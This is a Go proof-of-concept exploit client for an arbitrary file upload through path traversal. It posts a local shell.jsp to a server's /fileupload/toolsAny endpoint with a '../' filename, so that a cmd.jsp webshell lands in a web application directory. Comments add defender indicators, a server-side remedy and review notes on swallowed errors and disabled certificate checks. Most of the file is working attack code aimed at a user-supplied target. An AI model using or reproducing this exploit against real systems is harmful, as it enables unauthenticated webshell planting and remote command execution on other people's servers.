// Command main is a proof-of-concept client for an arbitrary file upload
// through path traversal. It sends one multipart POST to /fileupload/toolsAny
// in which both the form field name and the filename carry "../" sequences
// that point into a web application directory.
//
// Defender notes, drawn only from what this file sends:
//   - Request: POST <host>/fileupload/toolsAny, multipart/form-data, with a
//     Content-Disposition filename containing "../" and ending in ".jsp".
//   - The request carries no credentials or session, so the endpoint is
//     presumably reachable without authentication (confirm against the
//     server's access control configuration).
//   - Artifact: a new cmd.jsp under webapps/authenticationendpoint/, later
//     fetched at /authenticationendpoint/cmd.jsp.
//   - The User-Agent is a fixed, very old Firefox 4.0.1 string. It is a weak
//     signal on its own but useful when correlated with the items above.
//   - Server-side remedy: never join a client-supplied filename onto the
//     upload directory; keep only the base name, or resolve the final path and
//     reject anything outside the upload root.
package main

import (
	"bytes"
	"crypto/tls"
	"fmt"
	"io"
	"io/ioutil"
	"mime/multipart"
	"net/http"
	"os"
	"strings"
)

// main reads the base URL of the target from standard input and hands it to
// exp. The prompt asks for an address of the form https://127.0.0.1.
func main() {
	var host string
	fmt.Println("请输入目标地址, 如 https://127.0.0.1")
	fmt.Scanf("%s ", &host)
	exp(host)
}

// exp posts the local file ./shell.jsp to host's /fileupload/toolsAny endpoint
// as a multipart form part and prints whether the server appeared to accept it.
//
// host is the base URL; one trailing "/" is stripped before use.
//
// NOTE(review): every error return in this function is discarded. A failed
// request leaves the response nil and the following read panics. A missing
// ./shell.jsp is not reported either.
func exp(host string) {
	// The same traversal string is used as the form field name and as the
	// filename. A server that trusts the filename writes outside its upload
	// directory. This string is the main thing to match on in request logs.
	const traversalName = "../../../../repository/deployment/server/webapps/authenticationendpoint/cmd.jsp"

	host = strings.TrimSuffix(host, "/")

	// Assemble the multipart body in memory.
	var payload bytes.Buffer
	form := multipart.NewWriter(&payload)
	part, _ := form.CreateFormFile(traversalName, traversalName)

	src, _ := os.Open("./shell.jsp")
	defer src.Close()
	_, _ = io.Copy(part, src)

	// The content type carries the boundary, so it is read before the writer
	// is closed, which emits the terminating boundary.
	formType := form.FormDataContentType()
	form.Close()

	// Certificate verification is switched off: the peer's identity is not
	// checked and the connection can be intercepted.
	transport := &http.Transport{
		TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
	}
	client := &http.Client{Transport: transport}

	endpoint := host + "/fileupload/toolsAny"

	// The request is created without a body and the body is attached
	// afterwards, so net/http does not know its length up front.
	req, _ := http.NewRequest("POST", endpoint, nil)
	req.Header.Set("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1")
	req.Header.Set("Content-Type", formType)
	req.Body = ioutil.NopCloser(&payload)

	resp, _ := client.Do(req)
	reply, _ := ioutil.ReadAll(resp.Body)
	defer resp.Body.Close()

	// Success is only inferred from a 200 status with a non-empty body. The
	// code never checks that the file exists on the server.
	accepted := resp.StatusCode == 200 && len(reply) != 0
	if !accepted {
		fmt.Println("webshell写入失败")
		fmt.Println(string(reply))
		return
	}
	fmt.Printf("webshell写入成功, 地址: %v/authenticationendpoint/cmd.jsp\n", host)
}